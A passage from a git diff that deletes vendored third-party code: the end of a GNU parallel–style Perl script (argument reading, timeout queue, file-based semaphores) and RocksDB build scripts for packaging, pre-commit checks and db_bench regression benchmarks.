-	    $self->{'arg_matrix'}[$fhno][$len] = $arg;
-	    # make all new combinations
-	    my @combarg = ();
-	    for (my $fhn = 0; $fhn < $no_of_inputsources; $fhn++) {
-		push @combarg, [0, $#{$self->{'arg_matrix'}[$fhn]}];
-	    }
-	    $combarg[$fhno] = [$len,$len]; # Find only combinations with this new entry
-	    # map combinations
-	    # [ 1, 3, 7 ], [ 2, 4, 1 ]
-	    # =>
-	    # [ m[0][1], m[1][3], m[3][7] ], [ m[0][2], m[1][4], m[2][1] ]
-	    my @mapped;
-	    for my $c (expand_combinations(@combarg)) {
-		my @a;
-		for my $n (0 .. $no_of_inputsources - 1 ) {
-		    push @a,  $self->{'arg_matrix'}[$n][$$c[$n]];
-		}
-		push @mapped, \@a;
-	    }
-	    # append the mapped to the ungotten arguments
-	    push @{$self->{'unget'}}, @mapped;
-	    # get the first
-	    return shift @{$self->{'unget'}};
-	}
-    }
-    # all are eof or at EOF string; return from the unget queue
-    return shift @{$self->{'unget'}};
-}
-
-sub read_arg_from_fh {
-    # Read one Arg from filehandle
-    # Returns:
-    #   Arg-object with one read line
-    #   undef if end of file
-    my $fh = shift;
-    my $prepend = undef;
-    my $arg;
-    do {{
-	# This makes 10% faster
-	if(not ($arg = <$fh>)) {
-	    if(defined $prepend) {
-		return Arg->new($prepend);
-	    } else {
-		return undef;
-	    }
-	}
-#	::debug("run", "read $arg\n");
-	# Remove delimiter
-	$arg =~ s:$/$::;
-	if($Global::end_of_file_string and
-	   $arg eq $Global::end_of_file_string) {
-	    # Ignore the rest of input file
-	    close $fh;
-	    ::debug("run", "EOF-string ($arg) met\n");
-	    if(defined $prepend) {
-		return Arg->new($prepend);
-	    } else {
-		return undef;
-	    }
-	}
-	if(defined $prepend) {
-	    $arg = $prepend.$arg; # For line continuation
-	    $prepend = undef; #undef;
-	}
-	if($Global::ignore_empty) {
-	    if($arg =~ /^\s*$/) {
-		redo; # Try the next line
-	    }
-	}
-	if($Global::max_lines) {
-	    if($arg =~ /\s$/) {
-		# Trailing space => continued on next line
-		$prepend = $arg;
-		redo;
-	    }
-	}
-    }} while (1 == 0); # Dummy loop {{}} for redo
-    if(defined $arg) {
-	return Arg->new($arg);
-    } else {
-	::die_bug("multiread arg undefined");
-    }
-}
-
-sub expand_combinations {
-    # Input:
-    #   ([xmin,xmax], [ymin,ymax], ...)
-    # Returns: ([x,y,...],[x,y,...])
-    # where xmin <= x <= xmax and ymin <= y <= ymax
-    my $minmax_ref = shift;
-    my $xmin = $$minmax_ref[0];
-    my $xmax = $$minmax_ref[1];
-    my @p;
-    if(@_) {
-	# If there are more columns: Compute those recursively
-	my @rest = expand_combinations(@_);
-	for(my $x = $xmin; $x <= $xmax; $x++) {
-	    push @p, map { [$x, @$_] } @rest;
-	}
-    } else {
-	for(my $x = $xmin; $x <= $xmax; $x++) {
-	    push @p, [$x];
-	}
-    }
-    return @p;
-}
-
-
-package Arg;
-
-sub new {
-    my $class = shift;
-    my $orig = shift;
-    my @hostgroups;
-    if($opt::hostgroups) {
-	if($orig =~ s:@(.+)::) {
-	    # We found hostgroups on the arg
-	    @hostgroups = split(/\+/, $1);
-	    if(not grep { defined $Global::hostgroups{$_} } @hostgroups) {
-		::warning("No such hostgroup (@hostgroups)\n");
-		@hostgroups = (keys %Global::hostgroups);
-	    }
-        } else {
-	    @hostgroups = (keys %Global::hostgroups);
-	}
-    }
-    return bless {
-	'orig' => $orig,
-	'hostgroups' => \@hostgroups,
-    }, ref($class) || $class;
-}
-
-sub replace {
-    # Calculates the corresponding value for a given perl expression
-    # Returns:
-    #   The calculated string (quoted if asked for)
-    my $self = shift;
-    my $perlexpr = shift; # E.g. $_=$_ or s/.gz//
-    my $quote = (shift) ? 1 : 0; # should the string be quoted?
-    # This is actually a CommandLine-object,
-    # but it looks nice to be able to say {= $job->slot() =}
-    my $job = shift;
-    $perlexpr =~ s/^-?\d+ //; # Positional replace treated as normal replace
-    if(not defined $self->{"rpl",0,$perlexpr}) {
-	local $_;
-	if($Global::trim eq "n") {
-	    $_ = $self->{'orig'};
-	} else {
-	    $_ = trim_of($self->{'orig'});
-	}
-	::debug("replace", "eval ", $perlexpr, " ", $_, "\n");
-	if(not $Global::perleval{$perlexpr}) {
-	    # Make an anonymous function of the $perlexpr
-	    # And more importantly: Compile it only once
-	    if($Global::perleval{$perlexpr} =
-	       eval('sub { no strict; no warnings; my $job = shift; '.
-		    $perlexpr.' }')) {
-		# All is good
-	    } else {
-		# The eval failed. Maybe $perlexpr is invalid perl?
-		::error("Cannot use $perlexpr: $@\n");
-		::wait_and_exit(255);
-	    }
-	}
-	# Execute the function
-	$Global::perleval{$perlexpr}->($job);
-	$self->{"rpl",0,$perlexpr} = $_;
-    }
-    if(not defined $self->{"rpl",$quote,$perlexpr}) {
-	$self->{"rpl",1,$perlexpr} =
-	    ::shell_quote_scalar($self->{"rpl",0,$perlexpr});
-    }
-    return $self->{"rpl",$quote,$perlexpr};
-}
-
-sub orig {
-    my $self = shift;
-    return $self->{'orig'};
-}
-
-sub trim_of {
-    # Removes white space as specifed by --trim:
-    # n = nothing
-    # l = start
-    # r = end
-    # lr|rl = both
-    # Returns:
-    #   string with white space removed as needed
-    my @strings = map { defined $_ ? $_ : "" } (@_);
-    my $arg;
-    if($Global::trim eq "n") {
-	# skip
-    } elsif($Global::trim eq "l") {
-	for my $arg (@strings) { $arg =~ s/^\s+//; }
-    } elsif($Global::trim eq "r") {
-	for my $arg (@strings) { $arg =~ s/\s+$//; }
-    } elsif($Global::trim eq "rl" or $Global::trim eq "lr") {
-	for my $arg (@strings) { $arg =~ s/^\s+//; $arg =~ s/\s+$//; }
-    } else {
-	::error("--trim must be one of: r l rl lr.\n");
-	::wait_and_exit(255);
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-
-package TimeoutQueue;
-
-sub new {
-    my $class = shift;
-    my $delta_time = shift;
-    my ($pct);
-    if($delta_time =~ /(\d+(\.\d+)?)%/) {
-	# Timeout in percent
-	$pct = $1/100;
-	$delta_time = 1_000_000;
-    }
-    return bless {
-	'queue' => [],
-	'delta_time' => $delta_time,
-	'pct' => $pct,
-	'remedian_idx' => 0,
-	'remedian_arr' => [],
-	'remedian' => undef,
-    }, ref($class) || $class;
-}
-
-sub delta_time {
-    my $self = shift;
-    return $self->{'delta_time'};
-}
-
-sub set_delta_time {
-    my $self = shift;
-    $self->{'delta_time'} = shift;
-}
-
-sub remedian {
-    my $self = shift;
-    return $self->{'remedian'};
-}
-
-sub set_remedian {
-    # Set median of the last 999^3 (=997002999) values using Remedian
-    #
-    # Rousseeuw, Peter J., and Gilbert W. Bassett Jr. "The remedian: A
-    # robust averaging method for large data sets." Journal of the
-    # American Statistical Association 85.409 (1990): 97-104.
-    my $self = shift;
-    my $val = shift;
-    my $i = $self->{'remedian_idx'}++;
-    my $rref = $self->{'remedian_arr'};
-    $rref->[0][$i%999] = $val;
-    $rref->[1][$i/999%999] = (sort @{$rref->[0]})[$#{$rref->[0]}/2];
-    $rref->[2][$i/999/999%999] = (sort @{$rref->[1]})[$#{$rref->[1]}/2];
-    $self->{'remedian'} = (sort @{$rref->[2]})[$#{$rref->[2]}/2];
-}
-
-sub update_delta_time {
-    # Update delta_time based on runtime of finished job if timeout is
-    # a percentage
-    my $self = shift;
-    my $runtime = shift;
-    if($self->{'pct'}) {
-	$self->set_remedian($runtime);
-	$self->{'delta_time'} = $self->{'pct'} * $self->remedian();
-	::debug("run", "Timeout: $self->{'delta_time'}s ");
-    }
-}
-
-sub process_timeouts {
-    # Check if there was a timeout
-    my $self = shift;
-    # $self->{'queue'} is sorted by start time
-    while (@{$self->{'queue'}}) {
-	my $job = $self->{'queue'}[0];
-	if($job->endtime()) {
-	    # Job already finished. No need to timeout the job
-	    # This could be because of --keep-order
-	    shift @{$self->{'queue'}};
-	} elsif($job->timedout($self->{'delta_time'})) {
-	    # Need to shift off queue before kill
-	    # because kill calls usleep that calls process_timeouts
-	    shift @{$self->{'queue'}};
-	    $job->kill();
-	} else {
-	    # Because they are sorted by start time the rest are later
-	    last;
-	}
-    }
-}
-
-sub insert {
-    my $self = shift;
-    my $in = shift;
-    push @{$self->{'queue'}}, $in;
-}
-
-
-package Semaphore;
-
-# This package provides a counting semaphore
-#
-# If a process dies without releasing the semaphore the next process
-# that needs that entry will clean up dead semaphores
-#
-# The semaphores are stored in ~/.parallel/semaphores/id-<name> Each
-# file in ~/.parallel/semaphores/id-<name>/ is the process ID of the
-# process holding the entry. If the process dies, the entry can be
-# taken by another process.
-
-sub new {
-    my $class = shift;
-    my $id = shift;
-    my $count = shift;
-    $id=~s/([^-_a-z0-9])/unpack("H*",$1)/ige; # Convert non-word chars to hex
-    $id="id-".$id; # To distinguish it from a process id
-    my $parallel_dir = $ENV{'HOME'}."/.parallel";
-    -d $parallel_dir or mkdir_or_die($parallel_dir);
-    my $parallel_locks = $parallel_dir."/semaphores";
-    -d $parallel_locks or mkdir_or_die($parallel_locks);
-    my $lockdir = "$parallel_locks/$id";
-    my $lockfile = $lockdir.".lock";
-    if($count < 1) { ::die_bug("semaphore-count: $count"); }
-    return bless {
-	'lockfile' => $lockfile,
-	'lockfh' => Symbol::gensym(),
-	'lockdir' => $lockdir,
-	'id' => $id,
-	'idfile' => $lockdir."/".$id,
-	'pid' => $$,
-	'pidfile' => $lockdir."/".$$.'@'.::hostname(),
-	'count' => $count + 1 # nlinks returns a link for the 'id-' as well
-    }, ref($class) || $class;
-}
-
-sub acquire {
-    my $self = shift;
-    my $sleep = 1; # 1 ms
-    my $start_time = time;
-    while(1) {
-	$self->atomic_link_if_count_less_than() and last;
-	::debug("sem", "Remove dead locks");
-	my $lockdir = $self->{'lockdir'};
-	for my $d (glob "$lockdir/*") {
-	    ::debug("sem", "Lock $d $lockdir\n");
-	    $d =~ m:$lockdir/([0-9]+)\@([-\._a-z0-9]+)$:o or next;
-	    my ($pid, $host) = ($1, $2);
-	    if($host eq ::hostname()) {
-		if(not kill 0, $1) {
-		    ::debug("sem", "Dead: $d");
-		    unlink $d;
-		} else {
-		    ::debug("sem", "Alive: $d");
-		}
-	    }
-	}
-	# try again
-	$self->atomic_link_if_count_less_than() and last;
-	# Retry slower and slower up to 1 second
-	$sleep = ($sleep < 1000) ? ($sleep * 1.1) : ($sleep);
-	# Random to avoid every sleeping job waking up at the same time
-	::usleep(rand()*$sleep);
-	if(defined($opt::timeout) and
-	   $start_time + $opt::timeout > time) {
-	    # Acquire the lock anyway
-	    if(not -e $self->{'idfile'}) {
-		open (my $fh, ">", $self->{'idfile'}) or
-		    ::die_bug("timeout_write_idfile: $self->{'idfile'}");
-		close $fh;
-	    }
-	    link $self->{'idfile'}, $self->{'pidfile'};
-	    last;
-	}
-    }
-    ::debug("sem", "acquired $self->{'pid'}\n");
-}
-
-sub release {
-    my $self = shift;
-    unlink $self->{'pidfile'};
-    if($self->nlinks() == 1) {
-	# This is the last link, so atomic cleanup
-	$self->lock();
-	if($self->nlinks() == 1) {
-	    unlink $self->{'idfile'};
-	    rmdir $self->{'lockdir'};
-	}
-	$self->unlock();
-    }
-    ::debug("run", "released $self->{'pid'}\n");
-}
-
-sub _release {
-    my $self = shift;
-
-    unlink $self->{'pidfile'};
-    $self->lock();
-    my $nlinks = $self->nlinks();
-    ::debug("sem", $nlinks, "<", $self->{'count'});
-    if($nlinks-- > 1) {
-       unlink $self->{'idfile'};
-       open (my $fh, ">", $self->{'idfile'}) or
-           ::die_bug("write_idfile: $self->{'idfile'}");
-       print $fh "#"x$nlinks;
-       close $fh;
-    } else {
-       unlink $self->{'idfile'};
-       rmdir $self->{'lockdir'};
-    }
-    $self->unlock();
-    ::debug("sem", "released $self->{'pid'}\n");
-}
-
-sub atomic_link_if_count_less_than {
-    # Link $file1 to $file2 if nlinks to $file1 < $count
-    my $self = shift;
-    my $retval = 0;
-    $self->lock();
-    ::debug($self->nlinks(), "<", $self->{'count'});
-    if($self->nlinks() < $self->{'count'}) {
-	-d $self->{'lockdir'} or mkdir_or_die($self->{'lockdir'});
-	if(not -e $self->{'idfile'}) {
-	    open (my $fh, ">", $self->{'idfile'}) or
-		::die_bug("write_idfile: $self->{'idfile'}");
-	    close $fh;
-	}
-	$retval = link $self->{'idfile'}, $self->{'pidfile'};
-    }
-    $self->unlock();
-    ::debug("run", "atomic $retval");
-    return $retval;
-}
-
-sub _atomic_link_if_count_less_than {
-    # Link $file1 to $file2 if nlinks to $file1 < $count
-    my $self = shift;
-    my $retval = 0;
-    $self->lock();
-    my $nlinks = $self->nlinks();
-    ::debug("sem", $nlinks, "<", $self->{'count'});
-    if($nlinks++ < $self->{'count'}) {
-	-d $self->{'lockdir'} or mkdir_or_die($self->{'lockdir'});
-	if(not -e $self->{'idfile'}) {
-	    open (my $fh, ">", $self->{'idfile'}) or
-		::die_bug("write_idfile: $self->{'idfile'}");
-	    close $fh;
-	}
-	open (my $fh, ">", $self->{'idfile'}) or
-	    ::die_bug("write_idfile: $self->{'idfile'}");
-	print $fh "#"x$nlinks;
-	close $fh;
-	$retval = link $self->{'idfile'}, $self->{'pidfile'};
-    }
-    $self->unlock();
-    ::debug("sem", "atomic $retval");
-    return $retval;
-}
-
-sub nlinks {
-    my $self = shift;
-    if(-e $self->{'idfile'}) {
-	::debug("sem", "nlinks", (stat(_))[3], "size", (stat(_))[7], "\n");
-	return (stat(_))[3];
-    } else {
-	return 0;
-    }
-}
-
-sub lock {
-    my $self = shift;
-    my $sleep = 100; # 100 ms
-    my $total_sleep = 0;
-    $Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-    my $locked = 0;
-    while(not $locked) {
-	if(tell($self->{'lockfh'}) == -1) {
-	    # File not open
-	    open($self->{'lockfh'}, ">", $self->{'lockfile'})
-		or ::debug("run", "Cannot open $self->{'lockfile'}");
-	}
-	if($self->{'lockfh'}) {
-	    # File is open
-	    chmod 0666, $self->{'lockfile'}; # assuming you want it a+rw
-	    if(flock($self->{'lockfh'}, LOCK_EX()|LOCK_NB())) {
-		# The file is locked: No need to retry
-		$locked = 1;
-		last;
-	    } else {
-		if ($! =~ m/Function not implemented/) {
-		    ::warning("flock: $!");
-		    ::warning("Will wait for a random while\n");
-		    ::usleep(rand(5000));
-		    # File cannot be locked: No need to retry
-		    $locked = 2;
-		    last;
-		}
-	    }
-	}
-	# Locking failed in first round
-	# Sleep and try again
-	$sleep = ($sleep < 1000) ? ($sleep * 1.1) : ($sleep);
-	# Random to avoid every sleeping job waking up at the same time
-	::usleep(rand()*$sleep);
-	$total_sleep += $sleep;
-	if($opt::semaphoretimeout) {
-	    if($total_sleep/1000 > $opt::semaphoretimeout) {
-		# Timeout: bail out
-		::warning("Semaphore timed out. Ignoring timeout.");
-		$locked = 3;
-		last;
-	    }
-	} else {
-	    if($total_sleep/1000 > 30) {
-		::warning("Semaphore stuck for 30 seconds. Consider using --semaphoretimeout.");
-	    }
-	}
-    }
-    ::debug("run", "locked $self->{'lockfile'}");
-}
-
-sub unlock {
-    my $self = shift;
-    unlink $self->{'lockfile'};
-    close $self->{'lockfh'};
-    ::debug("run", "unlocked\n");
-}
-
-sub mkdir_or_die {
-    # If dir is not writable: die
-    my $dir = shift;
-    my @dir_parts = split(m:/:,$dir);
-    my ($ddir,$part);
-    while(defined ($part = shift @dir_parts)) {
-	$part eq "" and next;
-	$ddir .= "/".$part;
-	-d $ddir and next;
-	mkdir $ddir;
-    }
-    if(not -w $dir) {
-	::error("Cannot write to $dir: $!\n");
-	::wait_and_exit(255);
-    }
-}
-
-# Keep perl -w happy
-$opt::x = $Semaphore::timeout = $Semaphore::wait =
-$Job::file_descriptor_warning_printed = 0;
diff --git a/thirdparty/rocksdb/build_tools/make_package.sh b/thirdparty/rocksdb/build_tools/make_package.sh
deleted file mode 100755
index 58bac44..0000000
--- a/thirdparty/rocksdb/build_tools/make_package.sh
+++ /dev/null
@@ -1,128 +0,0 @@
-#/usr/bin/env bash
-
-set -e
-
-function log() {
-  echo "[+] $1"
-}
-
-function fatal() {
-  echo "[!] $1"
-  exit 1
-}
-
-function platform() {
-  local  __resultvar=$1
-  if [[ -f "/etc/yum.conf" ]]; then
-    eval $__resultvar="centos"
-  elif [[ -f "/etc/dpkg/dpkg.cfg" ]]; then
-    eval $__resultvar="ubuntu"
-  else
-    fatal "Unknwon operating system"
-  fi
-}
-platform OS
-
-function package() {
-  if [[ $OS = "ubuntu" ]]; then
-    if dpkg --get-selections | grep --quiet $1; then
-      log "$1 is already installed. skipping."
-    else
-      apt-get install $@ -y
-    fi
-  elif [[ $OS = "centos" ]]; then
-    if rpm -qa | grep --quiet $1; then
-      log "$1 is already installed. skipping."
-    else
-      yum install $@ -y
-    fi
-  fi
-}
-
-function detect_fpm_output() {
-  if [[ $OS = "ubuntu" ]]; then
-    export FPM_OUTPUT=deb
-  elif [[ $OS = "centos" ]]; then
-    export FPM_OUTPUT=rpm
-  fi
-}
-detect_fpm_output
-
-function gem_install() {
-  if gem list | grep --quiet $1; then
-    log "$1 is already installed. skipping."
-  else
-    gem install $@
-  fi
-}
-
-function main() {
-  if [[ $# -ne 1 ]]; then
-    fatal "Usage: $0 <rocksdb_version>"
-  else
-    log "using rocksdb version: $1"
-  fi
-
-  if [[ -d /vagrant ]]; then
-    if [[ $OS = "ubuntu" ]]; then
-      package g++-4.8
-      export CXX=g++-4.8
-
-      # the deb would depend on libgflags2, but the static lib is the only thing
-      # installed by make install
-      package libgflags-dev
-
-      package ruby-all-dev
-    elif [[ $OS = "centos" ]]; then
-      pushd /etc/yum.repos.d
-      if [[ ! -f /etc/yum.repos.d/devtools-1.1.repo ]]; then
-        wget http://people.centos.org/tru/devtools-1.1/devtools-1.1.repo
-      fi
-      package devtoolset-1.1-gcc --enablerepo=testing-1.1-devtools-6
-      package devtoolset-1.1-gcc-c++ --enablerepo=testing-1.1-devtools-6
-      export CC=/opt/centos/devtoolset-1.1/root/usr/bin/gcc
-      export CPP=/opt/centos/devtoolset-1.1/root/usr/bin/cpp
-      export CXX=/opt/centos/devtoolset-1.1/root/usr/bin/c++
-      export PATH=$PATH:/opt/centos/devtoolset-1.1/root/usr/bin
-      popd
-      if ! rpm -qa | grep --quiet gflags; then
-        rpm -i https://github.com/schuhschuh/gflags/releases/download/v2.1.0/gflags-devel-2.1.0-1.amd64.rpm
-      fi
-
-      package ruby
-      package ruby-devel
-      package rubygems
-      package rpm-build
-    fi
-  fi
-  gem_install fpm
-
-  make static_lib
-  make install INSTALL_PATH=package
-
-  cd package
-
-  LIB_DIR=lib
-  if [[ -z "$ARCH" ]]; then
-      ARCH=$(getconf LONG_BIT)
-  fi
-  if [[ ("$FPM_OUTPUT" = "rpm") && ($ARCH -eq 64) ]]; then
-      mv lib lib64
-      LIB_DIR=lib64
-  fi
-
-  fpm \
-    -s dir \
-    -t $FPM_OUTPUT \
-    -n rocksdb \
-    -v $1 \
-    --prefix /usr \
-    --url http://rocksdb.org/ \
-    -m rocksdb@fb.com \
-    --license BSD \
-    --vendor Facebook \
-    --description "RocksDB is an embeddable persistent key-value store for fast storage." \
-    include $LIB_DIR
-}
-
-main $@
diff --git a/thirdparty/rocksdb/build_tools/precommit_checker.py b/thirdparty/rocksdb/build_tools/precommit_checker.py
deleted file mode 100755
index 0f8884d..0000000
--- a/thirdparty/rocksdb/build_tools/precommit_checker.py
+++ /dev/null
@@ -1,208 +0,0 @@
-#!/usr/local/fbcode/gcc-4.9-glibc-2.20-fb/bin/python2.7
-
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import argparse
-import commands
-import subprocess
-import sys
-import re
-import os
-import time
-
-
-#
-# Simple logger
-#
-
-class Log:
-
-    def __init__(self, filename):
-        self.filename = filename
-        self.f = open(self.filename, 'w+', 0)
-
-    def caption(self, str):
-        line = "\n##### %s #####\n" % str
-        if self.f:
-            self.f.write("%s \n" % line)
-        else:
-            print(line)
-
-    def error(self, str):
-        data = "\n\n##### ERROR ##### %s" % str
-        if self.f:
-            self.f.write("%s \n" % data)
-        else:
-            print(data)
-
-    def log(self, str):
-        if self.f:
-            self.f.write("%s \n" % str)
-        else:
-            print(str)
-
-#
-# Shell Environment
-#
-
-
-class Env(object):
-
-    def __init__(self, logfile, tests):
-        self.tests = tests
-        self.log = Log(logfile)
-
-    def shell(self, cmd, path=os.getcwd()):
-        if path:
-            os.chdir(path)
-
-        self.log.log("==== shell session ===========================")
-        self.log.log("%s> %s" % (path, cmd))
-        status = subprocess.call("cd %s; %s" % (path, cmd), shell=True,
-                                 stdout=self.log.f, stderr=self.log.f)
-        self.log.log("status = %s" % status)
-        self.log.log("============================================== \n\n")
-        return status
-
-    def GetOutput(self, cmd, path=os.getcwd()):
-        if path:
-            os.chdir(path)
-
-        self.log.log("==== shell session ===========================")
-        self.log.log("%s> %s" % (path, cmd))
-        status, out = commands.getstatusoutput(cmd)
-        self.log.log("status = %s" % status)
-        self.log.log("out = %s" % out)
-        self.log.log("============================================== \n\n")
-        return status, out
-
-#
-# Pre-commit checker
-#
-
-
-class PreCommitChecker(Env):
-
-    def __init__(self, args):
-        Env.__init__(self, args.logfile, args.tests)
-        self.ignore_failure = args.ignore_failure
-
-    #
-    #   Get commands for a given job from the determinator file
-    #
-    def get_commands(self, test):
-        status, out = self.GetOutput(
-            "RATIO=1 build_tools/rocksdb-lego-determinator %s" % test, ".")
-        return status, out
-
-    #
-    # Run a specific CI job
-    #
-    def run_test(self, test):
-        self.log.caption("Running test %s locally" % test)
-
-        # get commands for the CI job determinator
-        status, cmds = self.get_commands(test)
-        if status != 0:
-            self.log.error("Error getting commands for test %s" % test)
-            return False
-
-        # Parse the JSON to extract the commands to run
-        cmds = re.findall("'shell':'([^\']*)'", cmds)
-
-        if len(cmds) == 0:
-            self.log.log("No commands found")
-            return False
-
-        # Run commands
-        for cmd in cmds:
-            # Replace J=<..> with the local environment variable
-            if "J" in os.environ:
-                cmd = cmd.replace("J=1", "J=%s" % os.environ["J"])
-                cmd = cmd.replace("make ", "make -j%s " % os.environ["J"])
-            # Run the command
-            status = self.shell(cmd, ".")
-            if status != 0:
-                self.log.error("Error running command %s for test %s"
-                               % (cmd, test))
-                return False
-
-        return True
-
-    #
-    # Run specified CI jobs
-    #
-    def run_tests(self):
-        if not self.tests:
-            self.log.error("Invalid args. Please provide tests")
-            return False
-
-        self.print_separator()
-        self.print_row("TEST", "RESULT")
-        self.print_separator()
-
-        result = True
-        for test in self.tests:
-            start_time = time.time()
-            self.print_test(test)
-            result = self.run_test(test)
-            elapsed_min = (time.time() - start_time) / 60
-            if not result:
-                self.log.error("Error running test %s" % test)
-                self.print_result("FAIL (%dm)" % elapsed_min)
-                if not self.ignore_failure:
-                    return False
-                result = False
-            else:
-                self.print_result("PASS (%dm)" % elapsed_min)
-
-        self.print_separator()
-        return result
-
-    #
-    # Print a line
-    #
-    def print_separator(self):
-        print("".ljust(60, "-"))
-
-    #
-    # Print two colums
-    #
-    def print_row(self, c0, c1):
-        print("%s%s" % (c0.ljust(40), c1.ljust(20)))
-
-    def print_test(self, test):
-        print(test.ljust(40), end="")
-        sys.stdout.flush()
-
-    def print_result(self, result):
-        print(result.ljust(20))
-
-#
-# Main
-#
-parser = argparse.ArgumentParser(description='RocksDB pre-commit checker.')
-
-# --log <logfile>
-parser.add_argument('--logfile', default='/tmp/precommit-check.log',
-                    help='Log file. Default is /tmp/precommit-check.log')
-# --ignore_failure
-parser.add_argument('--ignore_failure', action='store_true', default=False,
-                    help='Stop when an error occurs')
-# <test ....>
-parser.add_argument('tests', nargs='+',
-                    help='CI test(s) to run. e.g: unit punit asan tsan ubsan')
-
-args = parser.parse_args()
-checker = PreCommitChecker(args)
-
-print("Please follow log %s" % checker.log.filename)
-
-if not checker.run_tests():
-    print("Error running tests. Please check log file %s"
-          % checker.log.filename)
-    sys.exit(1)
-
-sys.exit(0)
diff --git a/thirdparty/rocksdb/build_tools/regression_build_test.sh b/thirdparty/rocksdb/build_tools/regression_build_test.sh
deleted file mode 100755
index 6980633..0000000
--- a/thirdparty/rocksdb/build_tools/regression_build_test.sh
+++ /dev/null
@@ -1,413 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-NUM=10000000
-
-if [ $# -eq 1 ];then
-  DATA_DIR=$1
-elif [ $# -eq 2 ];then
-  DATA_DIR=$1
-  STAT_FILE=$2
-fi
-
-# On the production build servers, set data and stat
-# files/directories not in /tmp or else the tempdir cleaning
-# scripts will make you very unhappy.
-DATA_DIR=${DATA_DIR:-$(mktemp -t -d rocksdb_XXXX)}
-STAT_FILE=${STAT_FILE:-$(mktemp -t -u rocksdb_test_stats_XXXX)}
-
-function cleanup {
-  rm -rf $DATA_DIR
-  rm -f $STAT_FILE.fillseq
-  rm -f $STAT_FILE.readrandom
-  rm -f $STAT_FILE.overwrite
-  rm -f $STAT_FILE.memtablefillreadrandom
-}
-
-trap cleanup EXIT
-
-if [ -z $GIT_BRANCH ]; then
-  git_br=`git rev-parse --abbrev-ref HEAD`
-else
-  git_br=$(basename $GIT_BRANCH)
-fi
-
-if [ $git_br == "master" ]; then
-  git_br=""
-else
-  git_br="."$git_br
-fi
-
-make release
-
-# measure fillseq + fill up the DB for overwrite benchmark
-./db_bench \
-    --benchmarks=fillseq \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0  > ${STAT_FILE}.fillseq
-
-# measure overwrite performance
-./db_bench \
-    --benchmarks=overwrite \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$((NUM / 10)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6  \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=8 > ${STAT_FILE}.overwrite
-
-# fill up the db for readrandom benchmark (1GB total size)
-./db_bench \
-    --benchmarks=fillseq \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=1 > /dev/null
-
-# measure readrandom with 6GB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom
-
-# measure readrandom with 6GB block cache and tailing iterator
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --use_tailing_iterator=1 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandomtailing
-
-# measure readrandom with 100MB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=104857600 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandomsmallblockcache
-
-# measure readrandom with 8k data in memtable
-./db_bench \
-    --benchmarks=overwrite,readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --writes=512 \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --write_buffer_size=1000000000 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom_mem_sst
-
-
-# fill up the db for readrandom benchmark with filluniquerandom (1GB total size)
-./db_bench \
-    --benchmarks=filluniquerandom \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --writes=$((NUM / 4)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=1 > /dev/null
-
-# dummy test just to compact the data
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 1000)) \
-    --reads=$((NUM / 1000)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > /dev/null
-
